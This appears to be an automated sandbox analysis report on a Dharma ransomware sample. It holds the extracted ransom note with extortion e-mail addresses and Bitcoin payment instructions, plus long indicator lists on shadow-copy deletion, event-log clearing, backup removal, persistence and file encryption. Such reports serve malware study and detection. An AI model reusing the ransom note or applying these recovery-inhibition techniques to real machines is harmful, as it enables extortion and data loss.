dharma | 5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8

Resubmissions

12-05-2023 13:34

230512-qvjbpadc48 10

08-05-2023 17:48

230508-wdvw2sdf6v 10

Analysis

max time kernel
631s
max time network
633s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
12-05-2023 13:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

VirusShare_5c36e305d926e55ef98d392176890cd2.exe
Size

1.0MB
MD5

5c36e305d926e55ef98d392176890cd2
SHA1

64a15cdf89b6c8b85cba355b6944074614d810fd
SHA256

5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8
SHA512

082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b
SSDEEP

24576:EoZZV7Uqi5inyhZQDkUzVDZJ2vH53GaJR38:HOqigyDQDZVq52wM

Score

10^/10

dharma discovery evasion ransomware

Malware Config

Extracted

Path

C:\info.hta

Ransom Note

All your files have been encrypted! All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail decryptioner@uncryptfile.com Write this ID in the title of your message 32B7E671 In case of no answer in 24 hours write us to theese e-mails: decoder@firemail.cc You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. Free decryption as guarantee Before paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) How to obtain Bitcoins The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. https://localbitcoins.com/buy_bitcoins Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins/ Attention! Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Emails

decryptioner@uncryptfile.com

decoder@firemail.cc

Signatures

Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
ransomware dharma

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
544	wevtutil.exe
948	wevtutil.exe
1268	wevtutil.exe
1720	wevtutil.exe
880	wevtutil.exe
1456	wevtutil.exe
1156	wevtutil.exe
1388	wevtutil.exe
1388	wevtutil.exe
1944	wevtutil.exe
1968	wevtutil.exe
1964	wevtutil.exe
1968	wevtutil.exe
1280	wevtutil.exe
1808	wevtutil.exe
1968	wevtutil.exe
1360	wevtutil.exe
1456	wevtutil.exe
1516	wevtutil.exe
228	wevtutil.exe
1608	wevtutil.exe
1156	wevtutil.exe
216	wevtutil.exe
948	wevtutil.exe
1604	wevtutil.exe
1132	wevtutil.exe
1528	wevtutil.exe
1992	wevtutil.exe
1628	wevtutil.exe
1928	wevtutil.exe
1772	wevtutil.exe
1988	wevtutil.exe
1448	wevtutil.exe
880	wevtutil.exe
1524	wevtutil.exe
1028	wevtutil.exe
1728	wevtutil.exe
1524	wevtutil.exe
1524	wevtutil.exe
1768	wevtutil.exe
672	wevtutil.exe
1964	wevtutil.exe
1084	wevtutil.exe
1604	wevtutil.exe
1768	wevtutil.exe
672	wevtutil.exe
1856	wevtutil.exe
1156	wevtutil.exe
2036	wevtutil.exe
772	wevtutil.exe
828	wevtutil.exe
1084	wevtutil.exe
524	wevtutil.exe
1968	wevtutil.exe
2040	wevtutil.exe
1856	wevtutil.exe
292	wevtutil.exe
1844	wevtutil.exe
1720	wevtutil.exe
1992	wevtutil.exe
1252	wevtutil.exe
1524	wevtutil.exe
1292	wevtutil.exe
1292	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

672 bcdedit.exe
1692 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

1532 wbadmin.exe
Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

pid	process
672	bcdedit.exe
1692	bcdedit.exe

pid	process
1532	wbadmin.exe

Drops startup file 3 IoCs

Processes:

attrib.execmd.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe	cmd.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

1132 icacls.exe

pid	process
1132	icacls.exe

Enumerates connected drives 3 TTPs 42 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

VirusShare_5c36e305d926e55ef98d392176890cd2.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\X:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\Z:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\G:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\Q:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\T:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\U:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\F:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\H:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\R:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\W:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\J:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\B:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\P:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\L:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\M:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\N:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\V:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\E:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\I:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\K:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\Y:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\A:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\O:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\S:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\G:	vssadmin.exe

Drops file in Program Files directory 64 IoCs

Processes:

VirusShare_5c36e305d926e55ef98d392176890cd2.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD.DEV_F_COL.HXK.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-options.xml_hidden.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jmx.xml.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImagesMask.bmp.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\TYPE.WAV.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\7-Zip\Lang\et.txt.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\about.html.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD10890_.GIF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR50B.GIF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187815.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Newsprint.xml.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEMANAGED.DLL.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BORDERBB.POC.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\INVITE.XML.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\IPEDINTL.DLL.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer.bat.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guam.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\IRIS\PREVIEW.GIF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Manaus.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PPTICO.EXE.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\javaws.jar.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\VelvetRose.css.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105240.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0251301.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14595_.GIF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left.gif.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MLSHEXT.DLL.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBPAGE.XML.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\EQUATION\MTEXTRA.TTF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02093_.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\LAUNCH.GIF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099153.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LISTBOX.JPG.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ru.txt.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\PREVIEW.GIF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Rio_Gallegos.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0183172.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_09.MID.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dhaka.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\RPLBRF35.CHM.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00728_.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0252349.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ba.txt.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187817.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Stanley.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00142_.GIF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0285792.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe

Drops file in Windows directory 4 IoCs

Processes:

wbadmin.exeVirusShare_5c36e305d926e55ef98d392176890cd2.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe
File created	C:\Windows\HRMPRIV	VirusShare_5c36e305d926e55ef98d392176890cd2.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

316 sc.exe
1736 sc.exe
580 sc.exe
1456 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1988 schtasks.exe
468 schtasks.exe
1448 schtasks.exe
672 schtasks.exe
1800 schtasks.exe

pid	process
316	sc.exe
1736	sc.exe
580	sc.exe
1456	sc.exe

pid	process
1988	schtasks.exe
468	schtasks.exe
1448	schtasks.exe
672	schtasks.exe
1800	schtasks.exe

Interacts with shadow copies 2 TTPs 15 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
1708	vssadmin.exe
468	vssadmin.exe
1960	vssadmin.exe
712	vssadmin.exe
1456	vssadmin.exe
1944	vssadmin.exe
544	vssadmin.exe
1652	vssadmin.exe
828	vssadmin.exe
1252	vssadmin.exe
760	vssadmin.exe
1748	vssadmin.exe
592	vssadmin.exe
2028	vssadmin.exe
216	vssadmin.exe

Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1780 taskkill.exe
872 taskkill.exe
948 taskkill.exe
524 taskkill.exe
1348 taskkill.exe
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2961826002-3968192592-354541192-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

pid	process
1780	taskkill.exe
872	taskkill.exe
948	taskkill.exe
524	taskkill.exe
1348	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2961826002-3968192592-354541192-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry class 2 IoCs

Processes:

rundll32.exerundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2961826002-3968192592-354541192-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2961826002-3968192592-354541192-1000_Classes\Local Settings	rundll32.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

VirusShare_5c36e305d926e55ef98d392176890cd2.exe

pid	process
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
